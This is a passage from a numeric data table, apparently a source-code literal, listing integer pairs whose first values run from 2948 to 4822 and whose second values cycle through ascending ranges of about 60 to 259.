(2948, 152),
(2949, 152),
(2950, 152),
(2951, 153),
(2952, 153),
(2953, 153),
(2954, 153),
(2955, 153),
(2956, 153),
(2957, 154),
(2958, 154),
(2959, 154),
(2960, 154),
(2961, 154),
(2962, 154),
(2963, 155),
(2964, 155),
(2965, 155),
(2966, 155),
(2967, 155),
(2968, 155),
(2969, 155),
(2970, 155),
(2971, 155),
(2972, 156),
(2973, 156),
(2974, 156),
(2975, 156),
(2976, 156),
(2977, 156),
(2978, 157),
(2979, 157),
(2980, 157),
(2981, 157),
(2982, 157),
(2983, 157),
(2984, 158),
(2985, 158),
(2986, 158),
(2987, 158),
(2988, 158),
(2989, 158),
(2990, 159),
(2991, 159),
(2992, 159),
(2993, 159),
(2994, 159),
(2995, 159),
(2996, 60),
(2997, 60),
(2998, 61),
(2999, 61),
(3000, 62),
(3001, 62),
(3002, 63),
(3003, 63),
(3004, 64),
(3005, 64),
(3006, 65),
(3007, 65),
(3008, 66),
(3009, 66),
(3010, 67),
(3011, 67),
(3012, 68),
(3013, 68),
(3014, 69),
(3015, 69),
(3016, 70),
(3017, 70),
(3018, 71),
(3019, 71),
(3020, 72),
(3021, 72),
(3022, 73),
(3023, 73),
(3024, 74),
(3025, 74),
(3026, 75),
(3027, 76),
(3028, 76),
(3029, 77),
(3030, 77),
(3031, 78),
(3032, 78),
(3033, 79),
(3034, 79),
(3035, 80),
(3036, 80),
(3037, 81),
(3038, 81),
(3039, 82),
(3040, 82),
(3041, 83),
(3042, 83),
(3043, 84),
(3044, 84),
(3045, 85),
(3046, 85),
(3047, 86),
(3048, 86),
(3049, 87),
(3050, 87),
(3051, 88),
(3052, 88),
(3053, 89),
(3054, 89),
(3055, 90),
(3056, 90),
(3057, 91),
(3058, 92),
(3059, 92),
(3060, 93),
(3061, 93),
(3062, 94),
(3063, 94),
(3064, 95),
(3065, 95),
(3066, 96),
(3067, 96),
(3068, 97),
(3069, 97),
(3070, 98),
(3071, 98),
(3072, 99),
(3073, 99),
(3074, 100),
(3075, 100),
(3076, 101),
(3077, 101),
(3078, 102),
(3079, 102),
(3080, 103),
(3081, 103),
(3082, 104),
(3083, 104),
(3084, 105),
(3085, 105),
(3086, 106),
(3087, 106),
(3088, 107),
(3089, 108),
(3090, 108),
(3091, 109),
(3092, 109),
(3093, 110),
(3094, 110),
(3095, 111),
(3096, 111),
(3097, 112),
(3098, 112),
(3099, 113),
(3100, 113),
(3101, 114),
(3102, 114),
(3103, 115),
(3104, 115),
(3105, 116),
(3106, 116),
(3107, 117),
(3108, 117),
(3109, 118),
(3110, 118),
(3111, 119),
(3112, 119),
(3113, 120),
(3114, 120),
(3115, 121),
(3116, 121),
(3117, 122),
(3118, 122),
(3119, 123),
(3120, 124),
(3121, 124),
(3122, 125),
(3123, 125),
(3124, 126),
(3125, 126),
(3126, 127),
(3127, 127),
(3128, 128),
(3129, 128),
(3130, 129),
(3131, 129),
(3132, 130),
(3133, 130),
(3134, 131),
(3135, 131),
(3136, 132),
(3137, 132),
(3138, 133),
(3139, 133),
(3140, 134),
(3141, 134),
(3142, 135),
(3143, 135),
(3144, 136),
(3145, 136),
(3146, 137),
(3147, 137),
(3148, 138),
(3149, 138),
(3150, 139),
(3151, 140),
(3152, 140),
(3153, 141),
(3154, 141),
(3155, 142),
(3156, 142),
(3157, 143),
(3158, 143),
(3159, 144),
(3160, 144),
(3161, 145),
(3162, 145),
(3163, 146),
(3164, 146),
(3165, 147),
(3166, 147),
(3167, 148),
(3168, 148),
(3169, 149),
(3170, 149),
(3171, 150),
(3172, 150),
(3173, 151),
(3174, 151),
(3175, 152),
(3176, 152),
(3177, 153),
(3178, 153),
(3179, 154),
(3180, 154),
(3181, 155),
(3182, 156),
(3183, 156),
(3184, 157),
(3185, 157),
(3186, 158),
(3187, 158),
(3188, 159),
(3189, 159),
(3190, 160),
(3191, 161),
(3192, 162),
(3193, 163),
(3194, 164),
(3195, 165),
(3196, 166),
(3197, 167),
(3198, 168),
(3199, 169),
(3200, 170),
(3201, 171),
(3202, 172),
(3203, 173),
(3204, 174),
(3205, 175),
(3206, 176),
(3207, 177),
(3208, 178),
(3209, 179),
(3210, 180),
(3211, 181),
(3212, 182),
(3213, 183),
(3214, 184),
(3215, 185),
(3216, 186),
(3217, 187),
(3218, 188),
(3219, 189),
(3220, 190),
(3221, 191),
(3222, 192),
(3223, 193),
(3224, 194),
(3225, 195),
(3226, 196),
(3227, 197),
(3228, 198),
(3229, 199),
(3230, 200),
(3231, 201),
(3232, 202),
(3233, 203),
(3234, 204),
(3235, 205),
(3236, 206),
(3237, 207),
(3238, 208),
(3239, 209),
(3240, 210),
(3241, 211),
(3242, 212),
(3243, 213),
(3244, 214),
(3245, 215),
(3246, 216),
(3247, 217),
(3248, 218),
(3249, 219),
(3250, 220),
(3251, 221),
(3252, 222),
(3253, 223),
(3254, 224),
(3255, 225),
(3256, 226),
(3257, 227),
(3258, 228),
(3259, 229),
(3260, 230),
(3261, 231),
(3262, 232),
(3263, 233),
(3264, 234),
(3265, 235),
(3266, 236),
(3267, 237),
(3268, 238),
(3269, 239),
(3270, 240),
(3271, 241),
(3272, 242),
(3273, 243),
(3274, 244),
(3275, 245),
(3276, 246),
(3277, 247),
(3278, 248),
(3279, 249),
(3280, 250),
(3281, 251),
(3282, 252),
(3283, 253),
(3284, 254),
(3285, 255),
(3286, 256),
(3287, 257),
(3288, 258),
(3289, 259),
(3290, 160),
(3291, 160),
(3292, 160),
(3293, 161),
(3294, 162),
(3295, 163),
(3296, 163),
(3297, 163),
(3298, 164),
(3299, 165),
(3300, 166),
(3301, 166),
(3302, 166),
(3303, 167),
(3304, 168),
(3305, 169),
(3306, 169),
(3307, 169),
(3308, 170),
(3309, 171),
(3310, 171),
(3311, 171),
(3312, 172),
(3313, 172),
(3314, 172),
(3315, 173),
(3316, 174),
(3317, 175),
(3318, 175),
(3319, 175),
(3320, 176),
(3321, 177),
(3322, 178),
(3323, 178),
(3324, 178),
(3325, 179),
(3326, 180),
(3327, 181),
(3328, 181),
(3329, 181),
(3330, 182),
(3331, 183),
(3332, 184),
(3333, 184),
(3334, 184),
(3335, 185),
(3336, 186),
(3337, 187),
(3338, 187),
(3339, 187),
(3340, 188),
(3341, 188),
(3342, 188),
(3343, 189),
(3344, 190),
(3345, 191),
(3346, 191),
(3347, 191),
(3348, 192),
(3349, 193),
(3350, 194),
(3351, 194),
(3352, 194),
(3353, 195),
(3354, 196),
(3355, 197),
(3356, 197),
(3357, 197),
(3358, 198),
(3359, 199),
(3360, 200),
(3361, 200),
(3362, 200),
(3363, 201),
(3364, 202),
(3365, 203),
(3366, 203),
(3367, 203),
(3368, 204),
(3369, 205),
(3370, 205),
(3371, 205),
(3372, 206),
(3373, 207),
(3374, 208),
(3375, 208),
(3376, 208),
(3377, 209),
(3378, 210),
(3379, 211),
(3380, 211),
(3381, 211),
(3382, 212),
(3383, 213),
(3384, 214),
(3385, 214),
(3386, 214),
(3387, 215),
(3388, 216),
(3389, 217),
(3390, 217),
(3391, 217),
(3392, 218),
(3393, 219),
(3394, 219),
(3395, 219),
(3396, 220),
(3397, 221),
(3398, 222),
(3399, 222),
(3400, 222),
(3401, 223),
(3402, 224),
(3403, 225),
(3404, 225),
(3405, 225),
(3406, 226),
(3407, 227),
(3408, 228),
(3409, 228),
(3410, 228),
(3411, 229),
(3412, 230),
(3413, 231),
(3414, 231),
(3415, 231),
(3416, 232),
(3417, 233),
(3418, 234),
(3419, 234),
(3420, 234),
(3421, 235),
(3422, 235),
(3423, 235),
(3424, 236),
(3425, 237),
(3426, 237),
(3427, 237),
(3428, 238),
(3429, 239),
(3430, 240),
(3431, 240),
(3432, 240),
(3433, 241),
(3434, 242),
(3435, 243),
(3436, 243),
(3437, 243),
(3438, 244),
(3439, 245),
(3440, 246),
(3441, 246),
(3442, 246),
(3443, 247),
(3444, 248),
(3445, 249),
(3446, 249),
(3447, 249),
(3448, 250),
(3449, 251),
(3450, 251),
(3451, 251),
(3452, 252),
(3453, 252),
(3454, 252),
(3455, 253),
(3456, 254),
(3457, 255),
(3458, 255),
(3459, 255),
(3460, 256),
(3461, 257),
(3462, 258),
(3463, 258),
(3464, 258),
(3465, 259),
(3466, 160),
(3467, 160),
(3468, 160),
(3469, 160),
(3470, 160),
(3471, 160),
(3472, 160),
(3473, 161),
(3474, 161),
(3475, 161),
(3476, 161),
(3477, 161),
(3478, 161),
(3479, 161),
(3480, 162),
(3481, 162),
(3482, 162),
(3483, 162),
(3484, 162),
(3485, 162),
(3486, 162),
(3487, 163),
(3488, 163),
(3489, 163),
(3490, 163),
(3491, 163),
(3492, 163),
(3493, 163),
(3494, 164),
(3495, 164),
(3496, 164),
(3497, 164),
(3498, 164),
(3499, 164),
(3500, 164),
(3501, 165),
(3502, 165),
(3503, 165),
(3504, 165),
(3505, 165),
(3506, 165),
(3507, 165),
(3508, 166),
(3509, 166),
(3510, 166),
(3511, 166),
(3512, 166),
(3513, 166),
(3514, 166),
(3515, 167),
(3516, 167),
(3517, 167),
(3518, 167),
(3519, 167),
(3520, 167),
(3521, 167),
(3522, 168),
(3523, 168),
(3524, 168),
(3525, 168),
(3526, 168),
(3527, 168),
(3528, 168),
(3529, 169),
(3530, 169),
(3531, 169),
(3532, 169),
(3533, 169),
(3534, 169),
(3535, 169),
(3536, 170),
(3537, 170),
(3538, 170),
(3539, 170),
(3540, 170),
(3541, 170),
(3542, 170),
(3543, 171),
(3544, 171),
(3545, 171),
(3546, 171),
(3547, 171),
(3548, 171),
(3549, 171),
(3550, 171),
(3551, 171),
(3552, 171),
(3553, 172),
(3554, 172),
(3555, 172),
(3556, 172),
(3557, 172),
(3558, 172),
(3559, 172),
(3560, 173),
(3561, 173),
(3562, 173),
(3563, 173),
(3564, 173),
(3565, 173),
(3566, 173),
(3567, 174),
(3568, 174),
(3569, 174),
(3570, 174),
(3571, 174),
(3572, 174),
(3573, 174),
(3574, 175),
(3575, 175),
(3576, 175),
(3577, 175),
(3578, 175),
(3579, 175),
(3580, 175),
(3581, 176),
(3582, 176),
(3583, 176),
(3584, 176),
(3585, 176),
(3586, 176),
(3587, 176),
(3588, 177),
(3589, 177),
(3590, 177),
(3591, 177),
(3592, 177),
(3593, 177),
(3594, 177),
(3595, 178),
(3596, 178),
(3597, 178),
(3598, 178),
(3599, 178),
(3600, 178),
(3601, 178),
(3602, 179),
(3603, 179),
(3604, 179),
(3605, 179),
(3606, 179),
(3607, 179),
(3608, 179),
(3609, 180),
(3610, 180),
(3611, 180),
(3612, 180),
(3613, 180),
(3614, 180),
(3615, 180),
(3616, 181),
(3617, 181),
(3618, 181),
(3619, 181),
(3620, 181),
(3621, 181),
(3622, 181),
(3623, 182),
(3624, 182),
(3625, 182),
(3626, 182),
(3627, 182),
(3628, 182),
(3629, 182),
(3630, 183),
(3631, 183),
(3632, 183),
(3633, 183),
(3634, 183),
(3635, 183),
(3636, 183),
(3637, 184),
(3638, 184),
(3639, 184),
(3640, 184),
(3641, 184),
(3642, 184),
(3643, 184),
(3644, 185),
(3645, 185),
(3646, 185),
(3647, 185),
(3648, 185),
(3649, 185),
(3650, 185),
(3651, 186),
(3652, 186),
(3653, 186),
(3654, 186),
(3655, 186),
(3656, 186),
(3657, 186),
(3658, 187),
(3659, 187),
(3660, 187),
(3661, 187),
(3662, 187),
(3663, 187),
(3664, 187),
(3665, 187),
(3666, 187),
(3667, 187),
(3668, 188),
(3669, 188),
(3670, 188),
(3671, 188),
(3672, 188),
(3673, 188),
(3674, 188),
(3675, 189),
(3676, 189),
(3677, 189),
(3678, 189),
(3679, 189),
(3680, 189),
(3681, 189),
(3682, 190),
(3683, 190),
(3684, 190),
(3685, 190),
(3686, 190),
(3687, 190),
(3688, 190),
(3689, 191),
(3690, 191),
(3691, 191),
(3692, 191),
(3693, 191),
(3694, 191),
(3695, 191),
(3696, 192),
(3697, 192),
(3698, 192),
(3699, 192),
(3700, 192),
(3701, 192),
(3702, 192),
(3703, 193),
(3704, 193),
(3705, 193),
(3706, 193),
(3707, 193),
(3708, 193),
(3709, 193),
(3710, 194),
(3711, 194),
(3712, 194),
(3713, 194),
(3714, 194),
(3715, 194),
(3716, 194),
(3717, 195),
(3718, 195),
(3719, 195),
(3720, 195),
(3721, 195),
(3722, 195),
(3723, 195),
(3724, 196),
(3725, 196),
(3726, 196),
(3727, 196),
(3728, 196),
(3729, 196),
(3730, 196),
(3731, 197),
(3732, 197),
(3733, 197),
(3734, 197),
(3735, 197),
(3736, 197),
(3737, 197),
(3738, 198),
(3739, 198),
(3740, 198),
(3741, 198),
(3742, 198),
(3743, 198),
(3744, 198),
(3745, 199),
(3746, 199),
(3747, 199),
(3748, 199),
(3749, 199),
(3750, 199),
(3751, 199),
(3752, 200),
(3753, 200),
(3754, 200),
(3755, 200),
(3756, 200),
(3757, 200),
(3758, 200),
(3759, 201),
(3760, 201),
(3761, 201),
(3762, 201),
(3763, 201),
(3764, 201),
(3765, 201),
(3766, 202),
(3767, 202),
(3768, 202),
(3769, 202),
(3770, 202),
(3771, 202),
(3772, 202),
(3773, 203),
(3774, 203),
(3775, 203),
(3776, 203),
(3777, 203),
(3778, 203),
(3779, 203),
(3780, 203),
(3781, 203),
(3782, 203),
(3783, 204),
(3784, 204),
(3785, 204),
(3786, 204),
(3787, 204),
(3788, 204),
(3789, 204),
(3790, 205),
(3791, 205),
(3792, 205),
(3793, 205),
(3794, 205),
(3795, 205),
(3796, 205),
(3797, 206),
(3798, 206),
(3799, 206),
(3800, 206),
(3801, 206),
(3802, 206),
(3803, 206),
(3804, 207),
(3805, 207),
(3806, 207),
(3807, 207),
(3808, 207),
(3809, 207),
(3810, 207),
(3811, 208),
(3812, 208),
(3813, 208),
(3814, 208),
(3815, 208),
(3816, 208),
(3817, 208),
(3818, 209),
(3819, 209),
(3820, 209),
(3821, 209),
(3822, 209),
(3823, 209),
(3824, 209),
(3825, 210),
(3826, 210),
(3827, 210),
(3828, 210),
(3829, 210),
(3830, 210),
(3831, 210),
(3832, 211),
(3833, 211),
(3834, 211),
(3835, 211),
(3836, 211),
(3837, 211),
(3838, 211),
(3839, 212),
(3840, 212),
(3841, 212),
(3842, 212),
(3843, 212),
(3844, 212),
(3845, 212),
(3846, 213),
(3847, 213),
(3848, 213),
(3849, 213),
(3850, 213),
(3851, 213),
(3852, 213),
(3853, 214),
(3854, 214),
(3855, 214),
(3856, 214),
(3857, 214),
(3858, 214),
(3859, 214),
(3860, 215),
(3861, 215),
(3862, 215),
(3863, 215),
(3864, 215),
(3865, 215),
(3866, 215),
(3867, 216),
(3868, 216),
(3869, 216),
(3870, 216),
(3871, 216),
(3872, 216),
(3873, 216),
(3874, 217),
(3875, 217),
(3876, 217),
(3877, 217),
(3878, 217),
(3879, 217),
(3880, 217),
(3881, 218),
(3882, 218),
(3883, 218),
(3884, 218),
(3885, 218),
(3886, 218),
(3887, 218),
(3888, 219),
(3889, 219),
(3890, 219),
(3891, 219),
(3892, 219),
(3893, 219),
(3894, 219),
(3895, 219),
(3896, 219),
(3897, 219),
(3898, 220),
(3899, 220),
(3900, 220),
(3901, 220),
(3902, 220),
(3903, 220),
(3904, 220),
(3905, 221),
(3906, 221),
(3907, 221),
(3908, 221),
(3909, 221),
(3910, 221),
(3911, 221),
(3912, 222),
(3913, 222),
(3914, 222),
(3915, 222),
(3916, 222),
(3917, 222),
(3918, 222),
(3919, 223),
(3920, 223),
(3921, 223),
(3922, 223),
(3923, 223),
(3924, 223),
(3925, 223),
(3926, 224),
(3927, 224),
(3928, 224),
(3929, 224),
(3930, 224),
(3931, 224),
(3932, 224),
(3933, 225),
(3934, 225),
(3935, 225),
(3936, 225),
(3937, 225),
(3938, 225),
(3939, 225),
(3940, 226),
(3941, 226),
(3942, 226),
(3943, 226),
(3944, 226),
(3945, 226),
(3946, 226),
(3947, 227),
(3948, 227),
(3949, 227),
(3950, 227),
(3951, 227),
(3952, 227),
(3953, 227),
(3954, 228),
(3955, 228),
(3956, 228),
(3957, 228),
(3958, 228),
(3959, 228),
(3960, 228),
(3961, 229),
(3962, 229),
(3963, 229),
(3964, 229),
(3965, 229),
(3966, 229),
(3967, 229),
(3968, 230),
(3969, 230),
(3970, 230),
(3971, 230),
(3972, 230),
(3973, 230),
(3974, 230),
(3975, 231),
(3976, 231),
(3977, 231),
(3978, 231),
(3979, 231),
(3980, 231),
(3981, 231),
(3982, 232),
(3983, 232),
(3984, 232),
(3985, 232),
(3986, 232),
(3987, 232),
(3988, 232),
(3989, 233),
(3990, 233),
(3991, 233),
(3992, 233),
(3993, 233),
(3994, 233),
(3995, 233),
(3996, 234),
(3997, 234),
(3998, 234),
(3999, 234),
(4000, 234),
(4001, 234),
(4002, 234),
(4003, 235),
(4004, 235),
(4005, 235),
(4006, 235),
(4007, 235),
(4008, 235),
(4009, 235),
(4010, 235),
(4011, 235),
(4012, 235),
(4013, 236),
(4014, 236),
(4015, 236),
(4016, 236),
(4017, 236),
(4018, 236),
(4019, 236),
(4020, 237),
(4021, 237),
(4022, 237),
(4023, 237),
(4024, 237),
(4025, 237),
(4026, 237),
(4027, 238),
(4028, 238),
(4029, 238),
(4030, 238),
(4031, 238),
(4032, 238),
(4033, 238),
(4034, 239),
(4035, 239),
(4036, 239),
(4037, 239),
(4038, 239),
(4039, 239),
(4040, 239),
(4041, 240),
(4042, 240),
(4043, 240),
(4044, 240),
(4045, 240),
(4046, 240),
(4047, 240),
(4048, 241),
(4049, 241),
(4050, 241),
(4051, 241),
(4052, 241),
(4053, 241),
(4054, 241),
(4055, 242),
(4056, 242),
(4057, 242),
(4058, 242),
(4059, 242),
(4060, 242),
(4061, 242),
(4062, 243),
(4063, 243),
(4064, 243),
(4065, 243),
(4066, 243),
(4067, 243),
(4068, 243),
(4069, 244),
(4070, 244),
(4071, 244),
(4072, 244),
(4073, 244),
(4074, 244),
(4075, 244),
(4076, 245),
(4077, 245),
(4078, 245),
(4079, 245),
(4080, 245),
(4081, 245),
(4082, 245),
(4083, 246),
(4084, 246),
(4085, 246),
(4086, 246),
(4087, 246),
(4088, 246),
(4089, 246),
(4090, 247),
(4091, 247),
(4092, 247),
(4093, 247),
(4094, 247),
(4095, 247),
(4096, 247),
(4097, 248),
(4098, 248),
(4099, 248),
(4100, 248),
(4101, 248),
(4102, 248),
(4103, 248),
(4104, 249),
(4105, 249),
(4106, 249),
(4107, 249),
(4108, 249),
(4109, 249),
(4110, 249),
(4111, 250),
(4112, 250),
(4113, 250),
(4114, 250),
(4115, 250),
(4116, 250),
(4117, 250),
(4118, 251),
(4119, 251),
(4120, 251),
(4121, 251),
(4122, 251),
(4123, 251),
(4124, 251),
(4125, 251),
(4126, 251),
(4127, 251),
(4128, 252),
(4129, 252),
(4130, 252),
(4131, 252),
(4132, 252),
(4133, 252),
(4134, 252),
(4135, 253),
(4136, 253),
(4137, 253),
(4138, 253),
(4139, 253),
(4140, 253),
(4141, 253),
(4142, 254),
(4143, 254),
(4144, 254),
(4145, 254),
(4146, 254),
(4147, 254),
(4148, 254),
(4149, 255),
(4150, 255),
(4151, 255),
(4152, 255),
(4153, 255),
(4154, 255),
(4155, 255),
(4156, 256),
(4157, 256),
(4158, 256),
(4159, 256),
(4160, 256),
(4161, 256),
(4162, 256),
(4163, 257),
(4164, 257),
(4165, 257),
(4166, 257),
(4167, 257),
(4168, 257),
(4169, 257),
(4170, 258),
(4171, 258),
(4172, 258),
(4173, 258),
(4174, 258),
(4175, 258),
(4176, 258),
(4177, 259),
(4178, 259),
(4179, 259),
(4180, 259),
(4181, 259),
(4182, 259),
(4183, 259),
(4184, 160),
(4185, 161),
(4186, 162),
(4187, 163),
(4188, 164),
(4189, 165),
(4190, 166),
(4191, 167),
(4192, 168),
(4193, 169),
(4194, 170),
(4195, 171),
(4196, 172),
(4197, 173),
(4198, 174),
(4199, 175),
(4200, 176),
(4201, 177),
(4202, 178),
(4203, 179),
(4204, 180),
(4205, 181),
(4206, 182),
(4207, 183),
(4208, 184),
(4209, 185),
(4210, 186),
(4211, 187),
(4212, 188),
(4213, 189),
(4214, 190),
(4215, 191),
(4216, 192),
(4217, 193),
(4218, 194),
(4219, 195),
(4220, 196),
(4221, 197),
(4222, 198),
(4223, 199),
(4224, 200),
(4225, 201),
(4226, 202),
(4227, 203),
(4228, 204),
(4229, 205),
(4230, 206),
(4231, 207),
(4232, 208),
(4233, 209),
(4234, 210),
(4235, 211),
(4236, 212),
(4237, 213),
(4238, 214),
(4239, 215),
(4240, 216),
(4241, 217),
(4242, 218),
(4243, 219),
(4244, 220),
(4245, 221),
(4246, 222),
(4247, 223),
(4248, 224),
(4249, 225),
(4250, 226),
(4251, 227),
(4252, 228),
(4253, 229),
(4254, 230),
(4255, 231),
(4256, 232),
(4257, 233),
(4258, 234),
(4259, 235),
(4260, 236),
(4261, 237),
(4262, 238),
(4263, 239),
(4264, 240),
(4265, 241),
(4266, 242),
(4267, 243),
(4268, 244),
(4269, 245),
(4270, 246),
(4271, 247),
(4272, 248),
(4273, 249),
(4274, 250),
(4275, 251),
(4276, 252),
(4277, 253),
(4278, 254),
(4279, 255),
(4280, 256),
(4281, 257),
(4282, 258),
(4283, 259),
(4284, 160),
(4285, 160),
(4286, 160),
(4287, 160),
(4288, 160),
(4289, 160),
(4290, 161),
(4291, 161),
(4292, 161),
(4293, 161),
(4294, 161),
(4295, 161),
(4296, 162),
(4297, 162),
(4298, 162),
(4299, 162),
(4300, 162),
(4301, 162),
(4302, 163),
(4303, 163),
(4304, 163),
(4305, 163),
(4306, 163),
(4307, 163),
(4308, 164),
(4309, 164),
(4310, 164),
(4311, 164),
(4312, 164),
(4313, 164),
(4314, 165),
(4315, 165),
(4316, 165),
(4317, 165),
(4318, 165),
(4319, 165),
(4320, 166),
(4321, 166),
(4322, 166),
(4323, 166),
(4324, 166),
(4325, 166),
(4326, 167),
(4327, 167),
(4328, 167),
(4329, 167),
(4330, 167),
(4331, 167),
(4332, 168),
(4333, 168),
(4334, 168),
(4335, 168),
(4336, 168),
(4337, 168),
(4338, 169),
(4339, 169),
(4340, 169),
(4341, 169),
(4342, 169),
(4343, 169),
(4344, 170),
(4345, 170),
(4346, 170),
(4347, 170),
(4348, 170),
(4349, 170),
(4350, 171),
(4351, 171),
(4352, 171),
(4353, 171),
(4354, 171),
(4355, 171),
(4356, 171),
(4357, 171),
(4358, 171),
(4359, 172),
(4360, 172),
(4361, 172),
(4362, 172),
(4363, 172),
(4364, 172),
(4365, 173),
(4366, 173),
(4367, 173),
(4368, 173),
(4369, 173),
(4370, 173),
(4371, 174),
(4372, 174),
(4373, 174),
(4374, 174),
(4375, 174),
(4376, 174),
(4377, 175),
(4378, 175),
(4379, 175),
(4380, 175),
(4381, 175),
(4382, 175),
(4383, 176),
(4384, 176),
(4385, 176),
(4386, 176),
(4387, 176),
(4388, 176),
(4389, 177),
(4390, 177),
(4391, 177),
(4392, 177),
(4393, 177),
(4394, 177),
(4395, 178),
(4396, 178),
(4397, 178),
(4398, 178),
(4399, 178),
(4400, 178),
(4401, 179),
(4402, 179),
(4403, 179),
(4404, 179),
(4405, 179),
(4406, 179),
(4407, 180),
(4408, 180),
(4409, 180),
(4410, 180),
(4411, 180),
(4412, 180),
(4413, 181),
(4414, 181),
(4415, 181),
(4416, 181),
(4417, 181),
(4418, 181),
(4419, 182),
(4420, 182),
(4421, 182),
(4422, 182),
(4423, 182),
(4424, 182),
(4425, 183),
(4426, 183),
(4427, 183),
(4428, 183),
(4429, 183),
(4430, 183),
(4431, 184),
(4432, 184),
(4433, 184),
(4434, 184),
(4435, 184),
(4436, 184),
(4437, 185),
(4438, 185),
(4439, 185),
(4440, 185),
(4441, 185),
(4442, 185),
(4443, 186),
(4444, 186),
(4445, 186),
(4446, 186),
(4447, 186),
(4448, 186),
(4449, 187),
(4450, 187),
(4451, 187),
(4452, 187),
(4453, 187),
(4454, 187),
(4455, 187),
(4456, 187),
(4457, 187),
(4458, 188),
(4459, 188),
(4460, 188),
(4461, 188),
(4462, 188),
(4463, 188),
(4464, 189),
(4465, 189),
(4466, 189),
(4467, 189),
(4468, 189),
(4469, 189),
(4470, 190),
(4471, 190),
(4472, 190),
(4473, 190),
(4474, 190),
(4475, 190),
(4476, 191),
(4477, 191),
(4478, 191),
(4479, 191),
(4480, 191),
(4481, 191),
(4482, 192),
(4483, 192),
(4484, 192),
(4485, 192),
(4486, 192),
(4487, 192),
(4488, 193),
(4489, 193),
(4490, 193),
(4491, 193),
(4492, 193),
(4493, 193),
(4494, 194),
(4495, 194),
(4496, 194),
(4497, 194),
(4498, 194),
(4499, 194),
(4500, 195),
(4501, 195),
(4502, 195),
(4503, 195),
(4504, 195),
(4505, 195),
(4506, 196),
(4507, 196),
(4508, 196),
(4509, 196),
(4510, 196),
(4511, 196),
(4512, 197),
(4513, 197),
(4514, 197),
(4515, 197),
(4516, 197),
(4517, 197),
(4518, 198),
(4519, 198),
(4520, 198),
(4521, 198),
(4522, 198),
(4523, 198),
(4524, 199),
(4525, 199),
(4526, 199),
(4527, 199),
(4528, 199),
(4529, 199),
(4530, 200),
(4531, 200),
(4532, 200),
(4533, 200),
(4534, 200),
(4535, 200),
(4536, 201),
(4537, 201),
(4538, 201),
(4539, 201),
(4540, 201),
(4541, 201),
(4542, 202),
(4543, 202),
(4544, 202),
(4545, 202),
(4546, 202),
(4547, 202),
(4548, 203),
(4549, 203),
(4550, 203),
(4551, 203),
(4552, 203),
(4553, 203),
(4554, 203),
(4555, 203),
(4556, 203),
(4557, 204),
(4558, 204),
(4559, 204),
(4560, 204),
(4561, 204),
(4562, 204),
(4563, 205),
(4564, 205),
(4565, 205),
(4566, 205),
(4567, 205),
(4568, 205),
(4569, 206),
(4570, 206),
(4571, 206),
(4572, 206),
(4573, 206),
(4574, 206),
(4575, 207),
(4576, 207),
(4577, 207),
(4578, 207),
(4579, 207),
(4580, 207),
(4581, 208),
(4582, 208),
(4583, 208),
(4584, 208),
(4585, 208),
(4586, 208),
(4587, 209),
(4588, 209),
(4589, 209),
(4590, 209),
(4591, 209),
(4592, 209),
(4593, 210),
(4594, 210),
(4595, 210),
(4596, 210),
(4597, 210),
(4598, 210),
(4599, 211),
(4600, 211),
(4601, 211),
(4602, 211),
(4603, 211),
(4604, 211),
(4605, 212),
(4606, 212),
(4607, 212),
(4608, 212),
(4609, 212),
(4610, 212),
(4611, 213),
(4612, 213),
(4613, 213),
(4614, 213),
(4615, 213),
(4616, 213),
(4617, 214),
(4618, 214),
(4619, 214),
(4620, 214),
(4621, 214),
(4622, 214),
(4623, 215),
(4624, 215),
(4625, 215),
(4626, 215),
(4627, 215),
(4628, 215),
(4629, 216),
(4630, 216),
(4631, 216),
(4632, 216),
(4633, 216),
(4634, 216),
(4635, 217),
(4636, 217),
(4637, 217),
(4638, 217),
(4639, 217),
(4640, 217),
(4641, 218),
(4642, 218),
(4643, 218),
(4644, 218),
(4645, 218),
(4646, 218),
(4647, 219),
(4648, 219),
(4649, 219),
(4650, 219),
(4651, 219),
(4652, 219),
(4653, 219),
(4654, 219),
(4655, 219),
(4656, 220),
(4657, 220),
(4658, 220),
(4659, 220),
(4660, 220),
(4661, 220),
(4662, 221),
(4663, 221),
(4664, 221),
(4665, 221),
(4666, 221),
(4667, 221),
(4668, 222),
(4669, 222),
(4670, 222),
(4671, 222),
(4672, 222),
(4673, 222),
(4674, 223),
(4675, 223),
(4676, 223),
(4677, 223),
(4678, 223),
(4679, 223),
(4680, 224),
(4681, 224),
(4682, 224),
(4683, 224),
(4684, 224),
(4685, 224),
(4686, 225),
(4687, 225),
(4688, 225),
(4689, 225),
(4690, 225),
(4691, 225),
(4692, 226),
(4693, 226),
(4694, 226),
(4695, 226),
(4696, 226),
(4697, 226),
(4698, 227),
(4699, 227),
(4700, 227),
(4701, 227),
(4702, 227),
(4703, 227),
(4704, 228),
(4705, 228),
(4706, 228),
(4707, 228),
(4708, 228),
(4709, 228),
(4710, 229),
(4711, 229),
(4712, 229),
(4713, 229),
(4714, 229),
(4715, 229),
(4716, 230),
(4717, 230),
(4718, 230),
(4719, 230),
(4720, 230),
(4721, 230),
(4722, 231),
(4723, 231),
(4724, 231),
(4725, 231),
(4726, 231),
(4727, 231),
(4728, 232),
(4729, 232),
(4730, 232),
(4731, 232),
(4732, 232),
(4733, 232),
(4734, 233),
(4735, 233),
(4736, 233),
(4737, 233),
(4738, 233),
(4739, 233),
(4740, 234),
(4741, 234),
(4742, 234),
(4743, 234),
(4744, 234),
(4745, 234),
(4746, 235),
(4747, 235),
(4748, 235),
(4749, 235),
(4750, 235),
(4751, 235),
(4752, 235),
(4753, 235),
(4754, 235),
(4755, 236),
(4756, 236),
(4757, 236),
(4758, 236),
(4759, 236),
(4760, 236),
(4761, 237),
(4762, 237),
(4763, 237),
(4764, 237),
(4765, 237),
(4766, 237),
(4767, 238),
(4768, 238),
(4769, 238),
(4770, 238),
(4771, 238),
(4772, 238),
(4773, 239),
(4774, 239),
(4775, 239),
(4776, 239),
(4777, 239),
(4778, 239),
(4779, 240),
(4780, 240),
(4781, 240),
(4782, 240),
(4783, 240),
(4784, 240),
(4785, 241),
(4786, 241),
(4787, 241),
(4788, 241),
(4789, 241),
(4790, 241),
(4791, 242),
(4792, 242),
(4793, 242),
(4794, 242),
(4795, 242),
(4796, 242),
(4797, 243),
(4798, 243),
(4799, 243),
(4800, 243),
(4801, 243),
(4802, 243),
(4803, 244),
(4804, 244),
(4805, 244),
(4806, 244),
(4807, 244),
(4808, 244),
(4809, 245),
(4810, 245),
(4811, 245),
(4812, 245),
(4813, 245),
(4814, 245),
(4815, 246),
(4816, 246),
(4817, 246),
(4818, 246),
(4819, 246),
(4820, 246),
(4821, 247),
(4822, 247),
